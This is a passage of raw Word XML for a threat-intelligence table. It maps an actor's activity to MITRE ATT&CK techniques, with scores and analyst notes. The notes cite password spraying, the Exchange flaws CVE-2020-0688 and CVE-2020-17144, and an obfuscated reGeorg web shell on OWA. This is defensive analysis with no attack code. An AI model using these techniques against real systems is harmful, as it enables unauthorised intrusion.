          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F4E4B00" w14:textId="3EAB9978" w:rsidR="001F175E" w:rsidRPr="00B857D7" w:rsidRDefault="001F175E" w:rsidP="00151FAB">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79A03994" w14:textId="25016E1C" w:rsidR="001F175E" w:rsidRPr="00B857D7" w:rsidRDefault="001F175E" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F175E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001F175E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1078 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001F175E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Valid Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12CDE944" w14:textId="67A3EC07" w:rsidR="001F175E" w:rsidRPr="00B857D7" w:rsidRDefault="00131D3A" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="007A8AFB" w14:textId="77777777" w:rsidR="001F175E" w:rsidRPr="00B857D7" w:rsidRDefault="001F175E" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78327847" w14:textId="16A2ADC6" w:rsidR="001F175E" w:rsidRDefault="00131D3A" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="433D255E" w14:textId="62E2A3C0" w:rsidR="001F175E" w:rsidRPr="00B857D7" w:rsidRDefault="001960FB" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-EXP/IF</w:t>
            </w:r>
            <w:r w:rsidR="000E336A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>DEL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="415B036D" w14:textId="77777777" w:rsidR="001F175E" w:rsidRDefault="00C5122C" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C5122C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> Use valid creds for initial access combine with CVEs….</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06641F20" w14:textId="77777777" w:rsidR="0074549B" w:rsidRDefault="0074549B" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1BCF69FB" w14:textId="3593537F" w:rsidR="0074549B" w:rsidRPr="0074549B" w:rsidRDefault="0074549B" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Potential here to also reference weaponization tactic but as this the actual initial access then described as exploitation of the passwords.</w:t>
            </w:r>
            <w:r w:rsidR="00CA54D9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> The ATT&amp;CK Resource Development Tactic is unclear on this.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00890771" w:rsidRPr="00B857D7" w14:paraId="17FF3D83" w14:textId="77777777" w:rsidTr="00151FAB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="620B772A" w14:textId="5120C9B3" w:rsidR="00890771" w:rsidRDefault="00890771" w:rsidP="00890771">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CE77646" w14:textId="59FF7B50" w:rsidR="00890771" w:rsidRPr="00B857D7" w:rsidRDefault="00890771" w:rsidP="00890771">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06B14A7A" w14:textId="5347F071" w:rsidR="00890771" w:rsidRPr="00B857D7" w:rsidRDefault="00C2729F" w:rsidP="00890771">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2729F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C2729F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1190 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C2729F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Exploit Public-Facing Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A82E54A" w14:textId="5C45F1FA" w:rsidR="00890771" w:rsidRPr="00B857D7" w:rsidRDefault="00890771" w:rsidP="00890771">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AA31FD9" w14:textId="77777777" w:rsidR="00890771" w:rsidRPr="00B857D7" w:rsidRDefault="00890771" w:rsidP="00890771">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F09AB1E" w14:textId="5FED0BAF" w:rsidR="00890771" w:rsidRDefault="00890771" w:rsidP="00890771">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00F644DE" w14:textId="7BE0E6FF" w:rsidR="00890771" w:rsidRPr="00B857D7" w:rsidRDefault="001960FB" w:rsidP="00890771">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-EXP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D8B9B6F" w14:textId="77777777" w:rsidR="00890771" w:rsidRPr="00890771" w:rsidRDefault="00890771" w:rsidP="00890771">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00890771">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">The actors used a variety of public exploits, including CVE </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FD6E097" w14:textId="77777777" w:rsidR="00890771" w:rsidRPr="00890771" w:rsidRDefault="00890771" w:rsidP="00890771">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00890771">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">2020-0688 and CVE 2020-17144 to gain privileged </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2172F705" w14:textId="77777777" w:rsidR="00890771" w:rsidRPr="00890771" w:rsidRDefault="00890771" w:rsidP="00890771">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00890771">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">remote code execution on vulnerable Microsoft Exchange </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="527B3F86" w14:textId="77777777" w:rsidR="00890771" w:rsidRPr="00890771" w:rsidRDefault="00890771" w:rsidP="00890771">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00890771">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">servers. In some cases, this exploitation occurred after </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D40E72C" w14:textId="77777777" w:rsidR="00890771" w:rsidRPr="00890771" w:rsidRDefault="00890771" w:rsidP="00890771">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00890771">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">valid credentials were identified by password spray, as </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02BC9726" w14:textId="1DF1679E" w:rsidR="00890771" w:rsidRPr="00890771" w:rsidRDefault="00890771" w:rsidP="00890771">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00890771">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>these vulnerabilities require authentication as a valid user</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A0F07" w:rsidRPr="007366F4" w14:paraId="606AC4BB" w14:textId="77777777" w:rsidTr="00E53D3E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="795442C3" w14:textId="5F3C9243" w:rsidR="007A0F07" w:rsidRPr="007366F4" w:rsidRDefault="007A0F07" w:rsidP="00E53D3E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30923E95" w14:textId="76091527" w:rsidR="007A0F07" w:rsidRPr="007366F4" w:rsidRDefault="008C730F" w:rsidP="00E53D3E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C730F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008C730F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008C730F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008C730F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008C730F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7577AAD3" w14:textId="47EDA81C" w:rsidR="007A0F07" w:rsidRPr="007366F4" w:rsidRDefault="007A0F07" w:rsidP="00E53D3E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A0F07">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007A0F07">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1027 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007A0F07">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Obfuscated Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AE1528C" w14:textId="3EB5E81E" w:rsidR="007A0F07" w:rsidRPr="007366F4" w:rsidRDefault="007A0F07" w:rsidP="00E53D3E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01287BF0" w14:textId="77777777" w:rsidR="007A0F07" w:rsidRPr="007366F4" w:rsidRDefault="007A0F07" w:rsidP="00E53D3E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="092746B6" w14:textId="03571464" w:rsidR="007A0F07" w:rsidRPr="007366F4" w:rsidRDefault="007A0F07" w:rsidP="00E53D3E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42D06127" w14:textId="341D14A5" w:rsidR="007A0F07" w:rsidRPr="007366F4" w:rsidRDefault="00FF7378" w:rsidP="00E53D3E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>I</w:t>
            </w:r>
            <w:r w:rsidR="006B5426">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>F</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BD3436F" w14:textId="77777777" w:rsidR="007A0F07" w:rsidRPr="007A0F07" w:rsidRDefault="007A0F07" w:rsidP="007A0F07">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="007A0F07">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">The actors used a modified and </w:t>
            </w:r>
            <w:r w:rsidRPr="007A0F07">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">obfuscated version of the </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72CF03A4" w14:textId="77777777" w:rsidR="007A0F07" w:rsidRPr="007A0F07" w:rsidRDefault="007A0F07" w:rsidP="007A0F07">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007A0F07">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>reGeorg</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007A0F07">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> web shell to maintain persistent access on a </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0ACB9069" w14:textId="77777777" w:rsidR="007A0F07" w:rsidRPr="007A0F07" w:rsidRDefault="007A0F07" w:rsidP="007A0F07">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A0F07">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>target's Outlook Web Access (OWA®</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F2BDA83" w14:textId="3E6FB9ED" w:rsidR="007A0F07" w:rsidRPr="007A0F07" w:rsidRDefault="007A0F07" w:rsidP="007A0F07">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A0F07">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">) </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007A0F07">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>server</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007A0F07">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007366F4" w:rsidRPr="007366F4" w14:paraId="43A108EE" w14:textId="77777777" w:rsidTr="00E53D3E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B9CE0AB" w14:textId="77777777" w:rsidR="007366F4" w:rsidRPr="007366F4" w:rsidRDefault="007366F4" w:rsidP="00E53D3E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007366F4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C63E233" w14:textId="77777777" w:rsidR="007366F4" w:rsidRPr="007366F4" w:rsidRDefault="007366F4" w:rsidP="00E53D3E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007366F4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007366F4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007366F4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EE9B5E4" w14:textId="77777777" w:rsidR="007366F4" w:rsidRPr="007366F4" w:rsidRDefault="007366F4" w:rsidP="00E53D3E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007366F4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1105 Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06F3ACF2" w14:textId="217988AD" w:rsidR="007366F4" w:rsidRPr="007366F4" w:rsidRDefault="007A0F07" w:rsidP="00E53D3E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D3E6D78" w14:textId="77777777" w:rsidR="007366F4" w:rsidRPr="007366F4" w:rsidRDefault="007366F4" w:rsidP="00E53D3E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EFA7F37" w14:textId="77777777" w:rsidR="007366F4" w:rsidRPr="007366F4" w:rsidRDefault="007366F4" w:rsidP="00E53D3E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
